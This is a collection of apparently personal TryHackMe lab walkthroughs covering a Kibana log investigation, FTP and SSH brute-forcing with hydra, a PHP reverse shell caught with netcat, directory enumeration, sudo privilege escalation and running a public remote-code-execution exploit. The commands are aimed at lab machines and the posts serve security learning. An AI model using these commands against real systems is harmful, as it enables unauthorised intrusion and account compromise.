TryHackMe - ItsyBitsy - writeup

ItsyBitsy room is second room in Security Information and Event Management module of the SOC Level 1 path on TryHackMe. Put your ELK knowledge together and investigate an incident. First you will need to boot up VM and Attackbox which will take few minutes. After attackbox is is booted up we can open Firefox browser and access the Kibana.

1. Question 1 - How many events were returned for the month of March 2022?
Change the date range to look at March 2022 log and you can answer first question.
2. Question 2 -What is the IP associated with the suspected user in the logs?
Question is asking about the source_ip filed. From the logs we can see 2 IP addresses so you much work to find right one.
3. Question 3 - The user’s machine used a legit windows binary to download a file from the C2 server. What is the name of the binary?
Answering this question took me longest time because I didnt find the right answer because I was either looking at wrong place or looked at right answer but not realising this was the answer. Hint look at the user_agent field ;)
4. Question 4 - The infected machine connected with a famous filesharing site in this period, which also acts as a C2 server used by the malware authors to communicate. What is the name of the filesharing site?
When we filter by IP from Question 2 we can answer this one quckly because there are only 2 logs from that source_ip.
5. Question 5 - What is the full URL of the C2 to which the infected host is connected?
Hostname + url field
6. Question 6 - A file was accessed on the filesharing site. What is the name of the file accessed?
We can connect to the filesharing site from URL from previous question and find a file there.
7. Question 7 - The file contains a secret code with the format THM{_____}.
Open file in the filesharing site and copy the flag code.

I hope anyone who gets stuck finds it helpful
AudiTTRSi

TryHackMe - h4cked - walkthrough

H4cked is one of easy room on the TryHackMe.com In task 1 we are faced by pcap file of the attack on the VM. Most of the answers in Task 1 are found from pcap file which you open with wireshark. Task 2 in this task you try to regain access to the VM same way as hacker did in task 1.

1. Step

We use hydra to crack new password with following command

hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://target_IP

2. Step

We log to the ftp and download the shell.php (get shell.php - is the command) and change IP and port to our attack box and upload it back (put shell.php)
3. Step
Before move to the starting the php script we need to start nc listener on attacking box with


nc -lvnp port_number

4. Step
Now we are ready to start php script shell.php from browser:

IP_target_machine/shell.php

5. Step
We get spawned reverse shell in terminal, with whoami command we check which user we have, then we can use

su jenny

and log in with pass we cracked before with hydra
6. Step
After that we can use

sudo su

and we have root access with this we can read root flag.

I hope someone stucked in any step of solving this room finds this walkthrough useful.

TryHackMe - Pickle Rick - walkthrough

Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
It is a CTF room on TryHackMe page if you are fan of Rick and Morty cartoon you should defently try to solve it. It is not that hard and you can solve it pretty fast.

1. step:
Start target machine that you will try to exploit and start Attackbox machine.
2. step:
As usually we try with nmap scan to check what ports are open on target machine with command:


nmap -sC -sV Target_IP


With only 2 ports open we check the web page
3. step:
There is nothing much on the page but is it? We check the page source code where we find username which might be useful in next steps
4. step:
With use of the gobuster we scan webpage to find hidden files or directories I have used following command:


gobuster dir -t 40 -u 10.10.151.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html,php,txt -t 60



5. step:
We find the login.php access page but we are missing password. We check the robot.txt file and we get possible password candidate for login. Which turns out that it is actual username and pass.

6. step:
We end up on command panel where we can write some command like ls and we can see interesting files there with Q1 answer ingridient. We try opening filed with cat command File_name.txt but it doesnt allow us.
We try with less command File_name.txt voila we opened it and we can answer first Q1.
7. step:
In this step we check the clue.txt file which says that we should look around directories for second ingridient. We try to get to other directories in /home/rick/ we find the file second ingridients. Since the spaces in files names and linux arent good friends we need to use less command like this:


less '/home/rick/second ingredients'


And voila we have 2nd ingredient and we can answer the Q2.
8. step:
with command

sudo -l

we check what we can run as root.
9. step:
we can try

sudo ls -la /root

and we find 3rd.txt
10. step:
Since we cannot open file in it's folder we can try copying to other directory and change permissions:


sudo cp /root/3rd.txt /var/www/html/ && chmod 777 3rd.txt

11. step:
In browser open file via Target_IP/3rd.txt. and we can answer last Q3 in this room.

I hope anyone who gets stucked finds this writeup helpful.

TryHackMe - Bounty Hacker -walkthrough

Bounty Hacker is one of easy rooms on TryHackMe.com
I was able to finish it up in couple of minutes with some reference from other similar rooms like this one.

1. First step

In this step you deploy the target VM and start Attackbox if you dont have it up already. It takes a minute or two to start up.


2. Second step

We use nmap to scan target VM.

nmap -A -T4 _IP_target_VM


Command takes some time to scan and display us back what ports are open. You can see 3 ports open 21 with FTP, 22 ssh and 80 apache server.


3. Third step

As FTP is open and it allows you to connect with anonymous user we try to connect to FTP server on target machine with command:

FTP IP_target_VM


When prompted for username you enter anonymous. We check what files we can find on server there are 2 files. One cointains note from one user this is also answer to the Q3 and other is list of what it looks like passwords. You can download files by command:


get file_name



4. Forth step

We will use hydra brute forcing tool to check if any passwords from list we could obtain from FTP server. I used following command:

hydra target_VM_IP ssh -l lin -P path_to_the_password_list -s 22 -vV


SSH user i used the one i found in file on FTP server.


5. Fifth step

After Hydra finish its work and you get correct pass you can ssh to the target VM.


6. Sixth step

When we are logged in server I tried to find user flag and write location of the file into user-flag file:

find / -type f -name user.txt 2>/dev/nul > user-flag 



7. Seventh step

In this step we check what command can current user run as sudo. We use:

sudo -l


As we see now only one command we can run. We had over to the GTFObins and check what command to run. Copy paste command to the command line and voila we have root access.
8. Eighth step

Last step is to find the root.txt file we write its location to root-flag file:

find / -type f -name root.txt 2>/dev/null > /tmp/root-flag 

I hope this helps to the people who might get stucked during solving this room.

TryHackMe - Exploit Vulnerabilities module - Task 5 - Practical: Manual Exploitation

This is my first writeup/walkthrough post for the TryHackMe website.
TryHackMe is online platform for learning cyber security, using hands-on exercises and labs.
This post refers to the Task 5 - Practical: Manual Explotaition which is part of the module of Exploit Vulnerabilities on THM JR penetration tester course.
Task 5 is final task in this submodule and is to show practical example of things you learned through the previous tasks.

First step is to start VM that you will try to exploit as description says it requires few minutes to boot up. If you will use Attackbox on their site don't forget to start it also.

Second step To answer the Q1 you need to just open website that is hosted on VM you started in first step. Scroll down to the bottom of the page and voila you will find name version of the website.

Third step Now that you know website version you will need to find the way to exploit and gain access to it. You could also online tools but this Task 5 one aims towards use of the searchsploit tool that is installed and ready to use in Attackbox machine. we use following command:

searchsploit online book store

We get 4 different results, but we choose last from the list wich offers remote code execution.


Forth step - To start exploit you will use following command:

python name_of_script.py VM_IP

Since I was not in the same directory as exploit script I got error that exploit script was not found, so I used:

locate 47887.py

With that I found correct location of the exploit script and then i could ran exploit script correctly without errors:

python path_to_the_exploit_/47887.py VM_ip_Address

You are then only prompted to continue with exploit and in matter of seconds you get access to the shell of the VM.

Fifth step - finding flag.txt file and answer to the Q3 of this task.
This did not require much of the search since file is located in current folder and I used

cat flag.txt

To display flag.txt file content. I hope that this post is helpful for anyone trying to solve this challenge. audittrsi